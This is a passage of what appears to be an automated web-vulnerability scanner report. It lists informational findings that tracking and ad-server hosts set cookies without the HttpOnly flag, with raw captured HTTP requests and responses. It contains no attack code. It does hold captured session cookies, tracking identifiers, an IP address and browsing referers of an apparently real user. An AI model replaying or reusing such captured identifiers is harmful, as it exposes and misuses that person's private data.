GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05d90d4830aed146528bc7a64ca8ada47c6bf82900592c70ecc3cf0b1540026e67dac30bd8f67c33172cefc55102800212a019e71c8816622a8e05f10e934ccb5dfda43050f415957009a93c2264405b2733e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adffbb0ddf19506aa1b79ffc81dbccf544d4c1440b6bf54cd895f8da9688aa5bdc0a67d4426af046a81046c53e4aa435fb61e110b17a27b1bf4335d67ab704b7c1146fd4b993c954ebbb8b9f7775be2a090d18414c00cb475a10d559cbd1008554cbf510f1ac594b789c7220ccac8ab7cbe4718f4500df296901685f020a1244a11fb6c96cf271db3fbc9e04d8bfaf9402f73078ac73ff713c32865df512b24b3ea21d0eaa6e4a43a9d58ea0743cb6d22de2b7509878fc77c403faf109124548857bce20bbf5c99a24c64c9991cbc396ca84692a505ae0d901bc6053be6674aa51ada449b125b82ba32fb4ced09c86478692535e794be8ca34d0ca1e7d0cf9ec8bf82fedf4e7a09a1a68b9cd7500419c41f67108d03dd5e022071c856cd4caba6a9fc51b3391c4af22b2957755ac6705e6e2627e5fe3a3dc3206c047b010e4475 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=83141D1BF679315B3A6FE0130C26720B; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:09 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; Expires=Sat, 31-Dec-2011 23:58:10 GMT; Path=/
Set-Cookie: _wt.mode-79569=fcdcc722e93200beff43; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959; Expires=Sat, 31-Dec-2011 23:58:10 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 45071


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.180. http://pixel.rubiconproject.com/di.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /di.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /di.php?v=2372||2373|0||3810||2374||&r=3761|0,3169,3578,3577,2110,2195,2196,2197,2579,2198,4134,3734,2199,2364,2362,2363,2200,3810,2111,2494,2201,3513,2202,2496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375, HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; rpx=4940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C694%2C3%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C552%2C14%2C%2C%265671%3D14742%2C608%2C2%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C608%2C2%2C%2C%267727%3D14742%2C553%2C3%2C%2C%265852%3D14742%2C488%2C2%2C%2C%266286%3D14843%2C141%2C2%2C%2C%266643%3D14894%2C0%2C1%2C%2C%264554%3D15350%2C0%2C1%2C%2C; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; ses2=13378^2&12566^2&12359^1; rdk=7743/12359; ses15=13378^2&13209^3&12566^2&12359^2; cd=false; khaos=GT3FYRAA-6-CO8F

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1%262372%3D1%263810%3D1%262374%3D1; expires=Sat, 31-Mar-2012 00:01:11 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;
14.181. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6432&rnd1317601647 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.igougo.com%2Ftraveldeals%2Fratefinder.aspx%3FTypeID%3D1%26SourceID%3DTVLY-dRF-Popunder%26adlt%3D1%26end%3DBoston%26rm%3D1%26dest%3DBoston%2C%2520undefined%2520undefined%26strtDate%3D10%2F04%2F2011%26endDate%3D10%2F07%2F2011&jsref=http%3A%2F%2Fwww.travelocity.com%2FpopWindow2%3FtheDomain%3Dwww.travelocity.com%26selectedForm%3Dcb-form-ho%26formPrefix%3DHO%26fromDate%3Ddd%26fromMonth%3Dmm%26fromYear%3Dyyyy%26toDate%3Ddd%26toMonth%3Dmm%26toYear%3Dyyyy%26theAdtoShow%3Dad2%26dest%3DBOS%26triptype%3D%26noOfRooms%3D1%26noOfAdults%3D1%26service%3DTRAVELOCITY%26oneway%3D&rnd=1317601643778
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpx=4940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C694%2C3%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C552%2C14%2C%2C%265671%3D14742%2C608%2C2%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C608%2C2%2C%2C%267727%3D14742%2C553%2C3%2C%2C%265852%3D14742%2C488%2C2%2C%2C%266286%3D14843%2C141%2C2%2C%2C%266643%3D14894%2C0%2C1%2C%2C%264554%3D15350%2C0%2C1%2C%2C; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; ses2=13378^2&12566^2&12359^1; ses15=13378^2&13209^3&12566^2&12359^2; cd=false; khaos=GT3FYRAA-6-CO8F; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1%262372%3D1%263810%3D1%262374%3D1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:27:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1%262372%3D1%263810%3D1%262374%3D1%266432%3D1; expires=Wed, 02-Nov-2011 00:27:30 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=4940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C694%2C3%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C612%2C16%2C%2C%265671%3D14742%2C608%2C2%2C%2C%264212%3D14742%2C154%2C2%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C608%2C2%2C%2C%267727%3D14742%2C553%2C3%2C%2C%265852%3D14742%2C488%2C2%2C%2C%266286%3D14843%2C141%2C2%2C%2C%266643%3D14894%2C0%2C1%2C%2C%264554%3D15350%2C0%2C1%2C%2C%262372%3D15352%2C0%2C1%2C%2C%263810%3D15352%2C0%2C1%2C%2C%262374%3D15352%2C0%2C1%2C%2C; expires=Wed, 02-Nov-2011 00:27:30 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;
14.182. http://psa-d.openx.com/w/1.0/ajs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://psa-d.openx.com
Path:   /w/1.0/ajs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/1.0/ajs?auid=34591&res=1920x1200x16&plg=swf,sl,qt,wmp,shk&ch=ISO-8859-1&tz=300&r=http%3A//ad.yieldmanager.com/clk%3F3%2CeAGlTl2LgzAQ.DW-SUiMn8g9xEsLXhu5glzxXkSTeBZbY6OH4q-.cJb-gS7L7swwOyzCcRVFTeVC3.fcpsY1jhF2eABF5MHQhnEcOzjwfCeAjj2miSAUwZQkh8P9RP6LRvSwITNpSE7Fxj5DAmYKgKs0mzfpzkL4tL4EEoWS9JFg9s8G2ccuW9Y0eUbTDmVre8lW7h7PX12W7yaW76.sHXrZyuZjzt3vXHTsXKAi52vx-NPcv9l2O02DhYnl7E0LMOlKyAWoQfYL4OpmxKrRYGiNaa9lo-XYWpi60HL8VfXyIgzzPYQM57XBl36Ueip11Qt1K.vfWy112UotjeGquHH8AXalc1A%3D%2C&url=http%3A//ad.yieldmanager.com/iframe3%3FsIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAW.30Nu93RCtBfFrLYyCes0SaSDuDUXyk5fgvQAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fd.tradex.openx.com%252Fafr.php%253Frefresh%253D40%2526zoneid%253D6511%2526cb%253Dinsert_random_number_here%2526loc%253D%2CB%253D10%2526Z%253D728x90%2526_salt%253D3414706147%2526r%253D0%2526s%253D2126909%2C9578b778-ed51-11e0-9730-78e7d1f5a73c%2C1317599547696&ref=http%3A//ad.yieldmanager.com/st%3Fad_type%3Diframe%26ad_size%3D728x90%26section%3D2126909&cb=54908222960 HTTP/1.1
Host: psa-d.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.yieldmanager.com/iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAW.30Nu93RCtBfFrLYyCes0SaSDuDUXyk5fgvQAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D3414706147%26r%3D0%26s%3D2126909,9578b778-ed51-11e0-9730-78e7d1f5a73c,1317599547696
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1745582797-1317599446738; OX_u=6f439ee2-7963-03ad-3e7a-e5d68608f547_m

Response

HTTP/1.1 200 OK
Set-Cookie: OX_u=6f439ee2-7963-03ad-3e7a-e5d68608f547_m; Version=1; Expires=Mon, 01 Oct 2012 23:52:28 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.8.1 (participate in the frantic)
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Sun, 02 Oct 2011 23:52:28 GMT
Content-Type: text/javascript
Content-Length: 1969
Cache-Control: private, max-age=0, no-cache
Connection: close


(function(){
document.write("<a href='http://psa-d.openx.com/w/1.0/rc?ts=0c2lkPTU0MTl8YXVpZD0zNDU5MXxhaWQ9NTc0ODd8cHViPTg3Mjd8bGlkPTQwMTc3fHQ9MXxyPWh0dHA6Ly9hZC55aWVsZG1hbmFnZXIuY29tL2Nsaz8zLGVBR2xUb
...[SNIP]...
14.183. http://r.openx.net/set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=25afcb2d-854d-efb2-7940-1323bbd101a7&rtb=f9bdca69-e609-4297-9145-48ea56a0756c HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=ba6bf0b1-8895-45a9-97a1-53f788c412d7; i=d2a43928-76cd-49ea-b899-b41fb371435f; p=1317599506

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:48 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Tue, 01-Oct-2013 23:51:48 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
14.184. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/beacon?b2=ZkSA7I0AZ4MffR9fYJOaS7OUxk4yIsAo0Hjd6QMr-OTL4k0mREyxv90izWMmaVqB6KZp_AsihChRf9hcbm1UDQ&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1; uid=2944787775510337379

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Sat, 31-Mar-2012 00:41:27 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 03 Oct 2011 00:41:26 GMT

GIF89a.............!.......,...........D..;
14.185. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/cms/id/0/ddc/1/pid/43/uid/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&mktid=&mpid=&fpid=5&rnd=2692888823581473023&nu=n&sp=y&ctid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; uid=2944787775510337379; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Fri, 30-Mar-2012 23:53:08 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sun, 02 Oct 2011 23:53:08 GMT

GIF89a.............!.......,...........D..;
14.186. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C3%7C4%7C1004%7C9%7C6; rds=15231%7C15228%7C15248%7C15235%7C15228%7C15228%7C15231; rv=1; uid=2944787775510337379

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Fri, 30-Mar-2012 23:49:37 GMT; Path=/
Set-Cookie: rrs=1006%7C1003%7C1002%7C4%7C1004%7C9%7C6%7C3; Domain=.turn.com; Expires=Fri, 30-Mar-2012 23:49:37 GMT; Path=/
Set-Cookie: rds=15231%7C15228%7C15249%7C15235%7C15249%7C15228%7C15231%7C15248; Domain=.turn.com; Expires=Fri, 30-Mar-2012 23:49:37 GMT; Path=/
Location: http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/9/url/
Date: Sun, 02 Oct 2011 23:49:37 GMT
Content-Length: 225

<html><body><p>Redirecting to <a href="http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/9/url/">http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/9/u
...[SNIP]...
14.187. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC8z/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC8z/ HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26620&s=26621
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rrs=1006%7C1003%7C1002%7C4%7C5%7C9%7C6%7C3; rds=15231%7C15228%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; rv=1; uid=2944787775510337379

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2944787775510337379; Domain=.turn.com; Expires=Sat, 31-Mar-2012 01:52:55 GMT; Path=/
Set-Cookie: rrs=1006%7C1003%7C5%7C1002%7C4%7C1004%7C9%7C6%7C3; Domain=.turn.com; Expires=Sat, 31-Mar-2012 01:52:55 GMT; Path=/
Set-Cookie: rds=15231%7C15228%7C15250%7C15249%7C15235%7C15250%7C15228%7C15231%7C15248; Domain=.turn.com; Expires=Sat, 31-Mar-2012 01:52:55 GMT; Path=/
Location: http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/
Date: Mon, 03 Oct 2011 01:52:55 GMT
Content-Length: 225

<html><body><p>Redirecting to <a href="http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/">http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/u
...[SNIP]...
